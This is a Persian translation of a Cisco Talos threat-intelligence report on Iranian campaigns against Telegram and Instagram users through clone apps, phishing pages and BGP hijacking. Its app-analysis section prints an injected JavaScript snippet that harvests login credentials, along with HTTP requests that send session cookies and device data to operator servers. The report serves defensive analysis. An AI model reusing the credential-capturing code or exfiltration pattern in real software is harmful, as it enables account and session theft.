گروه تحقیقاتی تالوس (Talos) که برای شرکت سیسکو تحقیقات می کند، گزارش تحقیقاتی خود حول چگونگی سرقت اطلاعات کاربران ایرانی تلگرام و اینستاگرام توسط حکومت ایران را منتشر کرده است.

عوامل دولت ایران تکنیک‌های مختلفی را برای دسترسی از راه دور به شبکه‌های اجتماعی و برنامه‌های پیام‌رسان امن در اختیار دارند. از سال ۲۰۱۷ تا ۲۰۱۸، گروه تالوس سیسکو تکنیک‌های گوناگونی را برای حمله به کاربران و سرقت اطلاعات شخصی ‌آنها مشاهده کرده‌است. این تکنیک‌ها شامل صفحات جعلی ورود، بدافزارهایی که خود را جایگزین نسخه‌های اصلی جا می‌زنند و سرقت درگاه مرزی (بی جی پی BGP) که بطور خاص کاربران ایرانی را که از اپلیکیشن امن تلگرام و سایت اجتماعی اینستاگرام استفاده می‌کنند هدف قرار داده‌است.

از آنجا که برنامه تلگرام توسط ۴۰ میلیون کاربر ایرانی استفاده می‌شود، هدف خوبی برای خاکستری افزارها (نرم افزارهای شبه آلوده – greyware) بوده‌است. درحالیکه تلگرام بیشتر برای ارتباطات روزانه استفاده می‌شود، گرداندگان اعتراضات در گذشته و بطور خاص در دسامبر ۲۰۱۷ از آن برای سازماندهی تظاهرات بر علیه حکومت ایران استفاده کرده‌اند. در موارد مختلفی حکومت ایران از تلگرام خواستار بستن کانال‌های مشخصی شد که “ترویج خشونت” می‌کرده‌اند. تاکتیک‌هایی که در این گزارش آمده‌است، از سال ۲۰۱۷ برای جمع‌آوری اطلاعات کاربران تلگرام و اینستاگرام استفاده‌ شده‌است.

برخی از این نسخه‌های شبیه‌سازی شده تلگرام، پس از نصب به کلیه کانتکت‌های روی گوشی موبایل و پیام‌ها دسترسی پیدا می‌کنند حتی اگر کاربران از نسخه تلگرام اصلی نیز استفاده کنند. در مورد اپلیکیشن تقلبی اینستاگرام، بدافزار تمام اطلاعات جلسه (سشن) را به سرورهای خود ارسال می‌کند. تالوس با اطمینان بالا اعلام می‌کند که این برنامه‌ها باید بعنوان “خاکستری افزار” (greyware) دسته بندی شوند. آنها به اندازه کافی آلوده نیستند که بعنوان بدافزار دسته بندی شوند ولی آنقدر مشکوک هستند که بتوان آنها را بعنوان برنامه‌های نامطلوب درنظر گرفت.این نوع برنامه‌ها را بسختی می‌توان شناسایی کرد چرا که عملکردی که کاربر انتظار دارد (بطور مثال ارسال پیام) را انجام می‌دهد. تنها زمانی این برنامه ها توسط محققین امنیت شناسایی می‌شوند که تاثیر آنها را در جای دیگر ببینند. تالوس چند نرم افزار را شناسایی کرده‌است که توانایی بکارگرفته شدن در کمپین‌های گسترده را دارند. این گروه معتقد است که این خاکستری افزارها پتانسیل نقض حریم خصوصی و امنیت کاربران تلفن همراه که از این برنامه‌ها استفاده می‌کنند را دارند. تحقیقات تالوس نشان می‌دهد که برخی از این برنامه‌ها اطلاعات را به سرور میزبان ارسال می‌کنند و یا از طریق آدرس‌های آی پی واقع در ایران کنترل می‌شوند، حتی اگر دستگاه‌های تلفن همراه خارج کشور باشند.

روش دیگری که تالوس در حملات ایران دیده‌است، ایجاد صفحات ورود جعلی بود. اگرچه این تکنیک پیشرفته نیست، برای کاربرانی که نسبت به امنیت سایبری آنطور که باید آگاهی ندارند، موثر واقع می‌شود. گروههای مخرب ایرانی مانند “بچه گربه جذاب” تا مدتی از این روش برای هدف قرار دادن پیام رسان‌های امن استفاده می‌کرد. عده‌ای نیز اقدام به ربودن پروتکل درگاه مرزی BGP دستگاه می‌کنند. این تکنیک ترافیک تمام روترها را به مسیرهای جدید منحرف می‌کند. برای ربودن BGP، نیاز به نوعی همکاری از طرف یک شرکت ارائه دهنده خدمات اینترنتی (ISP) وجود دارد و به راحتی قابل شناسایی است، بنابراین مسیرهای جدید نمی‌تواند برای مدت بسیار طولانی وجود داشته‌باشند.

تالوس ارتباط چندانی بین چند حمله‌ای که مشاهده شده را پیدا نکرده‌است، اما همه آنها کاربران ایرانی و برنامه تلگرام را مورد هدف قرار می‌دهند. اگرچه این گزارش روی ایران تمرکز دارد، ولی کاربران تلفن همراه در سراسر جهان باید نسبت به چنین تهدیداتی که می‌تواند توسط عواملی دولتی یا غیر دولتی در هر کشور انجام گیرد، اطلاع داشته باشند.

یک کاربر معمولی نمی‌تواند کاری برای پیشگیری یا مقابله با ربودن ترافیک BGP انجام دهد، اما استفاده از برنامه‌های قابل اعتماد از فروشگاههای نرم افزار رسمی ریسک را کاهش میدهد.این قاعده در مورد نسخه‌های شبیه‌سازی شده نیز صدق می‌کند. نصب برنامه ها از منابع غیر قابل اعتماد به میزانی کاربران را در معرض تهدید قرار می‌دهد که کاربران باید نسبت به آن آگاهی داشته باشند. در هر دو حالت، این خطر به طور قابل ملاحظه ای زمانیکه از برنامه‌ نسخه غیررسمی با “کارایی‌های پیشرفته” است، افزایش می یابد، حتی زمانی که آنها در فروشگاه گوگل پلی وجود داشته‌باشند.

تاکتیک‌ها

برنامه های ارتقایافته (خاکستری)

گروه نرم افزاری اندرومدا (ANDROMEDAA.IR) و آکادمی جهانی کمبریج (CAMBRIDGE UNIVERSAL ACADEMY)

توضیحات گروه نرم افزاری اندرومدا (ANDROMEDAA.IR)

تالوس یک توسعه دهنده نرم افزاری را که کاملا روی بازار ایران تمرکز دارد شناسایی کرد. ناشر تحت نام “andromedaa.ir” در هر دو سیستم عامل iOS و اندروید موجود می‌باشد. این ناشر برنامه‌هایی را توسعه می‌دهد که هدفش افزایش دسترسی کاربران به شبکه‌های اجتماعی مانند اینستاگرام و ایرانیانی که در کانال‌های مشخص تلگرام هستند می‌باشد.

در جستجو به دنبال وب سایت و محل‌هایی که نصب کننده این برنامه‌ها قرار دارد، واضح است که هیچ کدام از این برنامه ها در فروشگاه نرم افزار رسمی (گوگل یا اپل) منتشر نمی شوند، که احتمالا به دلیل تحریم های دولت ایالات متحده علیه ایران است.

image16
اطلاعات دامنه andromedaa.ir

دامنه andromedaa.ir با آدرس ایمیل h0mayun@outlook.com ثبت شده است. این همان آدرس ایمیل مورد استفاده برای ثبت دامنه های دیگر برای برنامه های اینستاگرم و نسخه‌های غیررسمی تلگرام است.

تالوس پس از تجزیه و تحلیل اطلاعات WHOIS مرتبط با دامنه andromedaa.com، دامنه‌های مختلفی را شناسایی کرد که به جز یک مورد بقیه با یک شماره تلفن ثبت شده‌اند.

screenshot2b2018-11-052bat2b16-32-20
فهرست بخشی از دامنه های یافت شده

تالوس آدرس‌های آی پی مرتبط با دامنه‌های فوق را اسکن کرد که یک الگوی خاصی را در گواهینامه‌های SSL نشان می‌داد.

image10
اطلاعات گواهینامه

توضیحات آکادمی جهانی کمبریج

Andromedaa.ir نرم افزار iOS را منتشر کرد، اما با یک گواهینامه به اسم توسعه دهنده‌‌ای بنام آکادمی جهانی کمبریج (Cambridge Universal Academy Ltd)، امضا شده است. این یک شرکت ثبت شده در انگلستان و ولز است که خدمات توسعه iOS را ارائه می دهد. این همان شرکت متعلق به یک شهروند ایرانی است که مالک حداقل چهار شرکت دیگر در چهار کشور مختلف است: انگلستان، ایالات متحده آمریکا، ترکیه و استونی. همه این شرکت‌ها خدمات یکسانی را ارائه می‌دهند، یک صفحه وب که در محتوا با هم مشابه‌اند.

screenshot2b2018-11-052bat2b16-31-23

گوگل آدرس اینترنتی mohajer.co.uk را بعنوان فیشینگ پرچم گذاری کرده است که ممکن است بخاطر این باشد که این سایت همراه با Mohajer.eu ارائه خدمات ویزا برای بریتانیا، ایالات متحده آمریکا، کانادا، استرالیا و سایر کشورهای منطقه اقتصادی اروپا می‌دهد.

مدل کسب و کار

همه برنامه های andromedaa.ir با هدف افزایش دیده‌شدن توسط کاربران در اینستاگرام یا تلگرام با افزایش لایک، کامنت، فالورها و یا حتی تعداد کاربران در یک کانال مشخص تلگرام درست شده‌اند. همه این برنامه‌ها تضمین می کنند که کاربران، ایرانی باشند. این گراداننده، سایت‌های دیگری مانند lik3.org را نیز مدیریت می کند، که آن سایت هم خدمات مشابهی جهت دیده‌شدن توسط کاربران را ارائه می‌دهد.

Screenshot from 2018-11-07 02-46-11
جدول قیمت‌ها

در حالی که این خدمات غیرقانونی نیستند، قطعا “خدمات خاکستری” محسوب می‌شوند. در همان سایت، مشاهده‌ می‌شود که مزایای استفاده از خدمات این شرکت را نسبت به سایرنی که همین خدمات را ارائه می‌دهند برجسته می کند.

Screenshot from 2018-11-07 02-43-43
چرا ما در سایت Lik3.org

شایان ذکر است که گردانندگان این سایت اعلام می کنند که هرگز رمز عبور مشتری را برای اینستاگرام درخواست نخواهند کرد و تمام کاربران سایت واقعی هستند. واقعیت این است که گردانندگان به رمز ورود مشتری برای اینستاگرام نیاز ندارند، زیرا کاربر اینستاگرام نیازی به ورود به آن حساب کاربری ندارد تا «پست» آنها را لایک کند.

در عوض گردانندگان به هزاران جلسه کاربر دسترسی دارند. آنها به تمام کاربرانی که برنامه های “رایگان” را نصب کرده اند، دسترسی دارند، به این معنی که آنها می توانند در هر جلسه‌ای هرکاری که می خواهند انجام دهند. در حالی که گردانندگان از روش های مختلف برای برنامه‌های تلگرام استفاده می‌کند، آنها نیز می‌تواند منجر به تصاحب کامل جلسه شود. برای جزئیات بیشتر به بخش «نمونه برنامه ها» مراجعه کنید.

خطر این نیست که این اپراتور می‌توانند پول دربیاورند، خطر این است که حریم خصوصی کاربران در معرض خطر است. روش‌های مشابهی در تلگرام و اینستاگرام استفاده می‌شود تا دسترسی اپراتور به لیست تماس کامل کاربر، پیام‌های آینده در تلگرام و مشخصات اینستاگرام کامل کاربر را میسر می‌سازد. ایران استفاده از تلگرام را ممنوع کرده است، زیرا چتها میتوانند رمزگذاری شوند و دسترسی دولت را مسدود کنند. با استفاده از این روش، اپراتور میتواند نقطه پایانی بر این نگرانی دولت ایران زده و به تمام چت های آینده دسترسی پیدا کند.

اگر چه بیشتر زیرساخت این برنامه‌ها در خدمات دهنده‌های اروپایی میزبانی میشوند، تمام برنامه‌های آزمایش شده با یک سرور در ایران خود را بروزرسانی می‌کنند. باز هم، این به تنهایی مخرب نیست، اما با توجه به موضوع فیلترینگ برنامه‌ها، این به طور بالقوه به دولت تنها نقطه دسترسی به هزاران دستگاه تلفن همراه را می دهد. با این وجود، تالوس نمی تواند رابطه مستقیمی بین این اپراتور و هر نهاد دولتی، ایرانی و غیره را پیدا کند.

نمونه برنامه ها

نرم‌افزار iOS فالور بگیر اینستاگرام

اولین برنامه‌ای که گروه مورد تجزیه و تحلیل قرار داده‌است، فالوئر بگیر اینستاگرام است که برای iOS طراحی شده است. Andromedaa.ir این برنامه را منتشر کرده و توسط آکادمی جهانی کمبریج امضا شده است. این برنامه یک پوشش برای اینستاگرام است.

image14
اولین صفحه بعد از ورود

توسعه دهنده برخی از ویژگی‌ها مانند ارز مجازی و پشتیبانی زبان فارسی را در میان سایر خدمات اضافه کرده‌است.

image21
اطلاعات گواهینامه

این برنامه از چارچوب iOS WebKit برای نمایش محتوای وب استفاده می کند که بتواند صفحه اینستاگرام را نمایش می دهد. پس از اولین بار که برنامه اجرا می‌شود، برنامه صفحه ورود اینستاگرام را نمایش می‌دهد که قطعه جاوا اسکریپت زیر در آن تزریق شده‌است.

document.addEventListener('click', function() {
try {
var tu = document.querySelector('[name="username"]');
var tp = document.querySelector('[name="password"]');
var tpV = (typeof tp == 'undefined') ? '' : tp.value;
var tuV = (typeof tu == 'undefined') ? '' : tu.value;
} catch (err) {
var tuV = '';
var tpV = '' }
var bd = document.getElementsByTagName('body')[0].innerText;
var messageToPost = {
'pu': tuV,
'pp': tpV,
'bd': bd
}; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);}, false);

کار این قطعه کد جاواسکریپت این است که زمانیکه کاربر روی دکمه “اتصال” کلیک می کند، کنترل را به برنامه iOS می‌دهد. برنامه اسم و رمز عبوری که کاربر وارد کرده‌ به همراه محتوای صفحه را دریافت می‌کند. پس از آن، برنامه در سرورهای اینستاگرام تایید می‌شود.

در طی این تحقیق، گروه متوجه شد که رمز عبور به طور مستقیم به سرور پشتیبان (v1.flbgr.com) ارسال نشده است. در پایین اطلاعاتی آورده شده که به صفحه وب ping.php فرستاده شده‌است:

POST /users/ping.php?m=ios&access=[redacted]&apk=35&imei=[redacted]&user_details=[redacted]&tokenNumber=[redacted] HTTP/1.1
Host: v1.flbgr.com
SESSIONID: [redacted]
HEADER: vf1IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Connection: close
Accept: */*
Accept-Language: fr-fr
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Encoding: gzip, deflate
Content-Length: 0

اپراتور سرور پشتیبان، نوع تلفن iOS، توکن و داده‌های کاربر مانند نام کاربری، تصویر نمایه و نام کامل، را دریافت می کند.

متغیر SESSIONID حاوی اطلاعات حساس تر است: هدر ارتباط اینستاگرام با کوکی معتبر. صاحب سرور می تواند جلسه اینستاگرم کاربر را با اطلاعات موجود در این متغییر سرقت کند.

این نرم افزار یک مکانیسم به روز رسانی دارد که بر خلاف اکثر زیرساخت‌ها خارج از ایران است. وقتی برنامه راه اندازی می شود، یک درخواست به ndrm.ir و به‌همراه اطلاعات نسخه فعلی برنامه ارسال می کند:

POST /start/fl.php?apk=35&m=ios HTTP/1.1
Host: ndrm.ir
HEADER: vf1
Connection: close
IOS: 3361ba9ec3480bcd3766e07cf6b4068a
Accept: */*
User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Content-Length: 0

اگر نسخه بروز نباشد، برنامه کاربر را به فروشگاه andromedaa هدایت می کند:

image6
دستورالعمل برای تایید گواهینامه توسعه دهنده

فروشگاه حاوی نسخه جدید برنامه و یک روش برای تایید گواهینامه توسعه دهنده می‌باشد. این به توسعه دهندگان امکان این را می‌دهد که در هر زمان برنامه و گواهینامه آنرا بروز کنند.

برنامه عضو بگیر (عضو در عضو)

هدف برنامه عضوبگیر افزایش تعداد اعضای کانال تلگرام کاربر است. این برنامه تضمین می کند که اعضای اضافه شده کاربران ایرانی خواهند بود.

image3
توضیحات برنامه

تالوس نسخه آندروید برنامه را تحلیل کرد. بسته نرم افزاری با یک گواهینامه خود امضا (self signed certificate) است که تا سال ۳۰۱۴ معتبر است.

image20
آخرین نسخه گواهینامه عضوگیر

نسخه های قبلی برنامه نیز از یک گواهینامه خود امضا استفاده می کردند، اما هر دو صادر کننده و اطلاعات آن به وضوح نادرست بودند.

image4
گواهینامه نسخه قبلی

درست مثل برنامه قبلی، برنامه عضوگیر نسخه تغییر داده شده برنامه تلگرام است که شامل کلاس های اصلی از برنامه تلگرام است.

image11
ساختار کلاس‌های عضوگیر

در حقیقت، تالوس در مانیفست برنامه نشانه‌هایی یافت که این بسته درحقیقت نسخه اصلی تلگرام بود که تغییر داده شده بود تا بتواند کد برنامه را در آن جاسازی کند. اسامی و برچسب هایی که در مانیفست استفاده می شود دارای چندین ارجاع به برنامه اصلی تلگرام هستند و حتی کلید API که برای برنامه Android Maps مورد استفاده قرار گرفته است، به‌همان صورت نگهداری شده است.

image24
چک بروزرسانی و پاسخ آن

درست مثل برنامه قبلی، این نیز با ارسال یک درخواست HTTP به دامنه ndrm.ir چک می کند که نسخه های جدید برنامه وجود دارد یا نه. اگر برنامه آخرین نسخه نیست، یک پیام و لینک برای دریافت آخرین نسخه را دریافت می کند، که این می تواند هر چیزی که اپراتور بخواهد باشد. در این مورد، این پیام یک لینک از کافه بازار cafebazaar.ir، که فروشگاه ایرانی اندورید است می‌باشد.

دامنه ndrm.ir تحت همان آدرس ایمیلی که تمام دامنه‌های پشتیبان برنامه ثبت شده‌اند، ثبت شده است. با این حال، این تنها برنامه است که بطور واقع در ایران میزبانی می‌شود و برنامه‌ای است که توانایی بروزرسانی روی دستگاه‌های تلفن همراه را دارد.

شکل ظاهری برنامه شبیه برنامه اصلی تلگرام است. درست مثل برنامه اصلی تلگرام، زمانیکه کاربر اولین بار می‌خواهد از آن استفاده کند، از او درخواست ارائه شماره تلفن را برای ثبت نام در تلگرام می‌کند.

image2
درخواست شماره تلفن

این ثبت نام، یک جلسه سایه برای دستگاه ایجاد می‌کند، دسترسی نرم افزار به لیست کامل کانتکت‌ها و پیام‌های آینده را فراهم می‌کند.

image13
جلسه ایجاد شده در یک دستگاه تلفن

هنگامی که فرآیند ثبت نام پایان می‌یابد، برنامه با سرور پشتیبان تماس برقرار می کند، اطلاعات مربوط به کاربر و دستگاه تلفن همراه را برای آن ارسال می کند.

GET /users/ping.php?access_hash=[redacted]&inactive=0&flags=1107&last_name=%21%21empty%21%21&phone=[redacted]&tg_id=[redacted]&m=d&user_name=[redacted]&first_name=Pr2&network=SYMA&country=[redacted]&apk=570&imei=[redacted]&brand=motorola&api=24&version=7.0&model=Moto+G+%285%29&tut=[redacted] HTTP/1.1
TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1
NUM: df27340104277f1e73142224d9cb59e8
HEADER: bt6
ADMIN: web
Host: v1.ozvdarozv.com
Connection: close
User-Agent: Apache-HttpClient/4.5.1 (java 1.4)

بیش از یک میلیون مشترک عضو کانال اندرومدا هستند که به‌طور اجباری هنگامیکه اولین بار برنامه را باز می‌کنند عضو کانال می‌شوند.

image15
اطلاعات کانال

Bitgram_dev

Bitgram_dev، بر خلاف توسعه دهندگان قبلی، ردپای زیادی در اینترنت ندارد. در حال حاضر، دو برنامه منتشر شده – AseGram و BitGram – در گوگل پلی دارد. این برنامه ها از ابتدای ماه سپتامبر تا آغاز ماه اکتبر در دسترس بوده و تقریبا ۱۰,۰۰۰ بار دانلود شده اند.

image19
AseGram و BitGram  روی گوگل پلی
image23
اطلاعات ناشر

با توجه به این که AseGram و BitGram قصد دارند فیلترینگ تلگرام در ایران را دور بزنند، منطقی است که ناشران بخواهند بعنوان یک معیار حفظ خود ردپای کمی در اینترنت بگذارند.

نمونه‌های برنامه

AseGram

برنامه AseGram در برخی از کشورها در فروشگاه گوگل پلی موجود است. حتی اگر برنامه از فروشگاه گوگل پلی دانلود شده باشد، گواهینامه امضای این بسته بلحاظ امنیتی کاملا بی فایده است.

image8
گواهینامه AseGram

این برنامه کپی شده از تلگرام به وضوح برای رهگیری رتباطات کاربر درست شده است. با این حال، این برنامه روش متفاوتی نسبت به سایر برنامه‌ها استفاده می‌کند: این نرم افزار با استفاده از یک پروکسی که در بسته تلگرام تعریف شده است جهت رهگیری ترافیک اقدام می‌کند.

image12
قسمتی از کد برنامه که پراکسی را مشخص می کند

درست مانند برنامه های قبلی، AseGram یک بسته تغییر یافته از تلگرام اصلی برای آندروید است. این تکنیک که توسعه دهنده تلگرام اصلی را تغییر می‌دهد بجای اینکه کلاینت تلگرام را خودش پیاده‌سازی کند، مانع بروز تمام اشکالاتی می‌شود که یک توسعه دهنده ممکن است برای پیاده‌سازی برنامه با آن مواجه شود.

جزئیات تنظیمات در بدافزار تعبیه شده و با استفاده از AES رمزنگاری شده است.

این برنامه با سه دامنه ارتباط برقرار می کند: talagram.ir، hotgram.ir و harsobh.com، که همه آنها به‌نام شرکت‌های ایرانی ثبت شده‌اند. در این حالت، مدیر برنامه به ارتباطات دسترسی دارد.

این برنامه سرویسی را ایجاد می کند که با بسته شدن برنامه غیر فعال نمی‌شود و زمانی که دستگاه راه‌اندازی شود، شروع به کار می‌کند. حتی اگر برنامه راه اندازی نشود. این سرویس همچنین مسئول تماس با آدرس های IP واقع در ایران می باشد. در واقع، این برنامه از کد نسخه‌ای از تلگرام به نام “تلگرام پیشرفته” یا (تلگرام طلایی) استفاده می کند. این نرم افزار در کافه بازار cafebazaa.ir، که یک فروشگاه اینترنتی آندروید تحت اداره حکومت ایران است قرار دارد.

image1
تلگرام طلایی در کافه بازار

مهم است تاکید کنیم که اولین جمله در این صفحه این است که “این برنامه در چارچوب قوانین کشور عمل می کند”. مشکل اینجاست که چگونه برنامه‌ای که فیلترینگ را دور میزند و به همان سرورهای تلگرام وصل شود که از طرف دولت فیلترشده است، می‌تواند قانونی باشد و لذا این ارتباطات بسیار مشکوک است.

این برنامه همچنین دارای کد برای استفاده از سرورهای پراکسی واقع در چندین کشور است که می تواند برای دور زدن فیلترینگ استفاده شود. با این حال، در طول تحقیق هرگز موردی که از این پراکسی‌ها استفاده شده باشد پیدا نشد. از طرف دیگر، اگر دستگاه تلفن در ایران نباشد، ما شاهد عبور ترافیک به سرورهای واقع در ایران هستیم که به نظر نمی رسد با برنامه ای که سعی در دورزدن فیلترینگ تلگرام دارد سازگار باشد.

وبسایت‌های جعلی

وبسایت‌های جعلی تلگرام

روش ساده‌ای برای دسترسی به حساب تلگرام یک کاربر این است که با مهندسی اجتماعی کاربر را به وارد کردن نام کاربری و رمز عبور خود در یک وب سایت جعلی که توسط مهاجم کنترل می شود، وادار کرد. دامنه youtubee-videos.com صفحه ورود به وب را برای تلگرام شبیه‌سازی کرده‌است.

image9
صفحه جعلی ورود به تلگرام

این دامنه در تاریخ ۲۵ ژوئیه ۲۰۱۷ ثبت شده است. بر اساس تاکتیک ها، تکنیک ها و روش های (TTP) استفاده شده، مانند الگوی ثبت دامنه، آدرس ایمیل استفاده شده برای ثبت دامنه – nami.rosoki@gmail.com، و سایر نشانه‌ها، این دامنه با گروه “بچه گربه جذاب” مرتبط است. این دامنه و ارتباط آن به گروه “بچه گربه جذاب” قبلا بصورت مستقل، توسط شرکت امنیت سایبری دیگری بنام کلیراسکای Clearsky مشخص شده بود. پس از بررسی بیشتر کد منبع وب سایت، به نظر می رسد که این سایت از روی پروژه وبوگرام “Webogram” در گیتاب “GitHub” ساخته شده است، همچنین در صفحه کد این سایت متونی وجود دارد که نشان می‌دهد این صفحه وب برای آیفون طراحی شده است.

image17
کد منبع، مرجع GitHub.com

دامنه‌های جدید شناسایی شده گروه بچه گربه جذاب

در حالی که تالوس مشغول تحقیق حول وب سایت های جعلی تلگرام مورد استفاده گروه بچه گربه جذاب بود، تعدادی دیگر دامنه های مخرب را یافت که حاوی کلمات کلیدی مانند “موبایل”، “پیام رسان” و در بعضی موارد “hangouts” بود که احتمالا اشاره به برنامه چت گوگل به نام هنگ اوت است. این نشان می دهد که این افراد علاقه مستمر به دسترسی به دستگاه های تلفن همراه کاربران و به ویژه پیام های چت آنها را دارند.
این دامنه ها نیز با استفاده از همان روش‌هایی که دامنه های دیگر مرتبط با این گروه در سال ۲۰۱۷ ثبت شده بودند، ثبت شده‌اند. تالوس از طریق تجزیه و تحلیل دامنه های بیشتری را کشف کرد که به همان آدرس آی پی منتهی می شود.

screenshot2b2018-11-052bat2b16-28-50

این به وضوح نشان می دهد که این گروه دارای فعالیت مداوم با تمرکز بر گرفتن مشخصات کاربر (مانند نام کاربری و رمز عبور) و برنامه های پیام رسان است.

انحراف ترافیک اینترنت

سابقه

در حین نظارت بر جریان پروتکل درگاه مرزی (BGPStream)، تالوس متوجه برخی از ناهنجاری‌هایی در مسیر ترافیک اینترنت شد که از سامانه خودگردان (ASN)  شماره ۵۸۲۲۴ نشات می‌گرفت. برای کسانی که با این پروتکل آشنا نیستند، پروتکل درگاه مرزی (BGP)، به عنوان “پروتکل مسیریابی اینترنت” می‌باشد. در این مورد، “یک مسیر به عنوان یک واحد اطلاعات تعریف می شود که مجموعه‌ای از مقصدها را با اطلاعات مسیر  رسیدن به آن مقصد، تعریف می کند.” به طور خلاصه، این پروتکل امکان برقراری ارتباط اینترنتی را در هنگام درخواست وصل به منابع موجود در خارج از شبکه فراهم می کند.

بی جی پی در سراسر اینترنت برای کمک به انتخاب بهترین مسیر استفاده می شود. مهم است که توجه داشته باشیم که این اطلاعات می‌تواند توسط خدمات دهنده اینترنتی (ISP)، دستکاری شود.

در حالی که این پروتکل برای مقابله با مشکلات شبکه طراحی شده بود، مکانیسم امنیتی کافی برای جلوگیری از سوء استفاده وجود نداشت. این می‌تواند منجر به عبور ترافیک قربانی از برخی از مسیر‌های از پیش تعیین شده بشود. این انحراف مسیر گاهی اوقات بنام ربودن جلسات بی جی پی (BGP hijacking sessions)  نامیده می‌شود.

مسیر از پیش طراحی شده سامانه خودگردان ۵۸۲۲۴

یک انحراف مسیر بی جی پی در تاریخ ۳۰ ژوئن ۲۰۱۸ در ساعت 7:41:28 UTC رخ داد. در طول این رویداد، سامانه خودگردان ۵۸۲۲۴ که در ایران است، یک به روز رسانی با پیشوند 185.112.156.0/22 را اعلام کرد.  شرکت مخابرات ایران PJS صاحب سامانه خودگردان ۵۸۲۲۴ است.

این محدوده ربوده شده متعلق به یک خدمات دهنده اینترنتی واقع در مجارستان بنام DoclerWeb Kft می‌باشد.این رویداد توسط BGPmon شناسایی شد و به مدت دو ساعت و ۱۵ دقیقه تا زمانی که یک پیام به روزرسانی جدید منتشر شد، ادامه پیدا کرد. در حالی که این رویداد در مقیاس بسیار کوچک بود، می توانست یک آزمایش برای تلاش بزرگتر برای ربودن  BGP باشد.

screenshot2b2018-11-052bat2b16-26-15

انحرافات مسیر BGP بیشتری از سامانه خودگردان ۵۸۲۲۴ نشات می‌گرفت. در تاریخ ۳۰ ژوئیه ۲۰۱۸ در ساعت 6:28:25 UTC، چهار مسیر BGP در همان زمان را بروز رسانی کرد که در ارتباطات تلگرام اختلال ایجاد کرد. هنگامی که روترها این پیام به روز رسانی را از طریق سیستم مکالمه دریافت کردند، بخشی از ترافیک که به مقصد سرورهای تلگرام بود را از طریق سامانه خودگردان ۵۸۲۲۴ عبور دادند. این کمپین مؤثر بود و دو ساعت و ۱۵ دقیقه طول کشید تا روترها پیام به‌روز رسانی را دریافت کردند و عمل ربودن ترافیک به پایان رسید.

screenshot2b2018-11-052bat2b16-27-22

چگونه ربودن بی جی پی می تواند باعث حملات شبکه کامپیوتر بشود

به لحاظ تئوریک، این می تواند جزئی از یک عملیات برای به خطر انداختن ارتباط با سرورهای تلگرام باشد. ربودن جلسات منجر به ارسال برخی پیام‌های تلگرام به یک خدمات دهنده ارتباطات مخابراتی ایران شد. همانطور که دیگر محققان امنیتی آن را دو ماه قبل در ماه مه ۲۰۱۸ گزارش کرده اند، سایر بازیگران دولتی از این تکنیک برای ارائه بدافزار استفاده می کنند. هنگامی که ترافیک از طریق یک خدمات دهنده‌ اینترنتی مورد نظر هدایت می شود، می تواند تغییر یافته و مانیتور شود. گزارشاتی وجود دارد که نشان می دهد که خدمات دهندگان مخابرات ایرانی قبلا با درخواست‌های دولت ایران برای دستیابی به ارتباطات همکاری کرده اند. این مقاله نشان می دهد شرکت های مخابراتی پیامک‌های حاوی کد تأیید تلگرام را جهت دسترسی به حساب های تلگرام در اختیار مقامات دولتی ایران قرار داده‌اند.

این توانایی خاص می تواند به بازیگران اجازه دهد تا ترافیک سامانه‌های خودگردان مجاور را از طریق ایران عبور دهند. این امر می تواند به بازیگران مخرب اجازه دسترسی به دستگاه‌های کاربران در کشورهای اطراف را که از خدمات دهندگان مخابرات غیر ایرانی استفاده می کنند، نیز بدهد.

محمد جواد آذری جهرمی، وزیر ارتباطات و فن‌آوری اطلاعات ایران، این رویداد را تایید کرده و اظهار داشت که مورد بررسی قرار خواهد گرفت. در مورد این تحقیق از سوی دولت ایران هیچ چیز منتشر نشده است.

نتیجه گیری

سه تکنیک که در اینجا مورد بحث قرار گرفت، تنها شیوه‌هایی نیست که بازیگران مورد حمایت دولت ایران می توانند برای راه اندازی مکانیزم‌های جاسوسی که شهروندان خود را هدف قرار می‌دهند استفاده کنند. موضوع فایروال اینترنتی توده‌ای و نظارت در گذشته مطرح شده است. برخی از این کمپین ها نیز برنامه های ویژه ای مانند تلگرام را هدف قرار داده اند. با این حال، این حوادث حداقل دو وجه مشترک دارند: ایران و تلگرام. این وجوه باید منفک از هم باشند، زیرا ایران تلگرام را در کشور ممنوع کرده است. اما تالوس متوجه شد که چندین برنامه غیررسمی تلگرام با چندین هزار نسخه نصب شده وجود دارد که به نحوی با آدرس های آی پی واقع در ایران تماس می گیرند، برخی از آنها این گونه تبلیغ می کنند که می توانند از فیلترینگ عبور کنند. فعالیت این برنامه ها غیرقانونی نیست، اما این برنامه‌ها به اپراتورهای آن کنترل کامل برنامه‌های پیام رسان و دسترسی به دستگاه تلفن همراه کاربر را می دهد.

فعالیت های طولانی مدت گروه هایی مانند بچه گربه جذاب، حتی با استفاده از تکنیک های فیشینگ کلاسیک، هنوز هم در برابر کاربرانی که از امنیت سایبری بسیار آگاه نیستند موثر هستند. با توجه به اینکه هدف مشترک همه این فعالیتها شهروندان بود، قابل درک است که اکثریت قریب به اتفاق جمعیت هر کشوری دانش سایبری کافی ندارند، بنابراین حتی این روش کلاسیک می تواند بسیار موثر باشد.

